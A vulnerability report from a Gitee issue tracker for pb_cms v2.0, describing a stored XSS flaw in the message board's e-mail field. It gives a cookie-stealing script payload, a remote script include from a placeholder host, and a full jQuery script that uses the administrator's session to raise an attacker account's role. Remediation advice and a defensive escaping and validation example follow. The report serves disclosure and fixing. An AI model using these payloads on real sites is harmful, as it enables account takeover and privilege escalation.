
LinZhaoguan / pb-cms


A stored XSS vulnerability in pb_cms v2.0 message board

Status: Completed
Created 2022-03-15 14:58

The message board function in pb_cms v2.0 allows an attacker to store malicious XSS code in the mailbox (e-mail) field of a message. The stored payload is later executed in the administrator's back end when the message is displayed.

No account is required.

Open the message board page, put the XSS payload in the mailbox input box, fill in the remaining fields and submit.

payload: <script>alert(document.cookie)</script>


When an administrator, or any other role that is allowed to open the comment management page, opens that page, the stored payload is rendered into the page and executed in their browser:


Escalation of Privileges

The same vulnerability can also be used to escalate any account to any role: the injected script runs in the administrator's browser on the same origin as the back end, so it can call the user management endpoints with the administrator's session.
Open the message board page, put the following payload in the mailbox input box, fill in the remaining fields and submit.
payload: <script src="http://xxxxx/x.js"></script>
x.js:

// Runs inside the administrator's browser once the comment management page
// renders the stored payload. jQuery ($) is assumed to be loaded by the
// back-end page, and the relative URLs resolve against the back-end path,
// so every request carries the administrator's session cookie.
$.post(
    "user/list", {          // enumerate all users; a large pageSize returns them in one call
        pageNumber: 1,
        pageSize: 9999
    },
    function(data) {
        console.log(data);
        for (const index in data.rows) {
            console.log(data.rows[index]);
            console.log(data.rows[index].userId);
            console.log(data.rows[index].username);
            if (data.rows[index].username === 'test') {   // the attacker's own low-privilege account
                $.post(
                    "user/assign/role", {
                        roleIdStr: 1,                     // id of the target role to assign
                        userId: data.rows[index].userId
                    });
            }
        }
    }
);

Role of the test account before the administrator visits the comment management page:


When an administrator, or any other role that is allowed to open the comment management page, opens that page, the script executes in their session and reassigns the role of the test account:

Remediation advice:

  • Strictly validate and sanitize user input: the mailbox field only needs to accept a well-formed e-mail address, so anything containing markup can be rejected at submission time.
  • Strictly control what is rendered in the page: HTML-encode user-supplied fields when the comment management page displays them instead of inserting them into the page as raw HTML.
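The following is an added example, not code from the pb-cms project, showing why the stored mailbox value fires in the comment management page and what the two pieces of remediation advice look like in practice. The sample rows, field names and the shape of the rendered table are assumptions made for illustration; the second row carries the payload from this report.

```javascript
// Added example (not pb-cms project code). Field names and row shape are
// assumptions; the payload string is the one from the report.

// Constructed sample rows, as the admin page might receive them from a
// comment-list endpoint. Row 2 carries the stored XSS payload.
const SAMPLE_ROWS = [
  { id: 1, nickname: 'alice', email: 'alice@example.com', content: 'hello' },
  { id: 2, nickname: 'attacker', email: '<script>alert(document.cookie)</script>', content: 'hi' },
];

// Vulnerable pattern: values from the JSON response are concatenated into
// markup unescaped, so the browser parses the stored <script> tag.
function renderRowUnsafe(row) {
  return `<tr><td>${row.nickname}</td><td>${row.email}</td><td>${row.content}</td></tr>`;
}

// Minimal HTML entity encoder for text nodes and quoted attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened pattern: every user-controlled field is encoded before it is
// placed in markup, so the payload is displayed as literal text.
function renderRowSafe(row) {
  return `<tr><td>${escapeHtml(row.nickname)}</td><td>${escapeHtml(row.email)}</td><td>${escapeHtml(row.content)}</td></tr>`;
}

// Submit-time validation for the mailbox field: only a plausible address is
// accepted, so markup is rejected before it is ever stored. Output encoding
// remains necessary because other fields (nickname, content) are free text.
const EMAIL_RE = /^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$/;
function isValidEmail(value) {
  return typeof value === 'string' && value.length <= 254 && EMAIL_RE.test(value);
}

function renderTable(rows, renderRow) {
  return `<table>${rows.map(renderRow).join('')}</table>`;
}

// Quick check used to compare the two renderers.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Stand-alone demonstration.
console.log('unsafe render executes payload:', containsScriptTag(renderTable(SAMPLE_ROWS, renderRowUnsafe)));
console.log('safe render executes payload:  ', containsScriptTag(renderTable(SAMPLE_ROWS, renderRowSafe)));
console.log('payload accepted as e-mail:    ', isValidEmail(SAMPLE_ROWS[1].email));
```

The encoder is applied per field at render time rather than to the stored value, so the database keeps the original text and the same rows can still be shown safely in any other view; the validator is the defence-in-depth layer for the one field that has a well-defined format.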

Comments (0)

SomUrim created the task
SomUrim edited the description
SomUrim edited the description
SomUrim edited the description
LinZhaoguan changed the task status from To Do to Completed via LinZhaoguan/pb-cms commit 4c62c71

Language: Java
Repository: https://gitee.com/LinZhaoguan/pb-cms.git (git@gitee.com:LinZhaoguan/pb-cms.git)
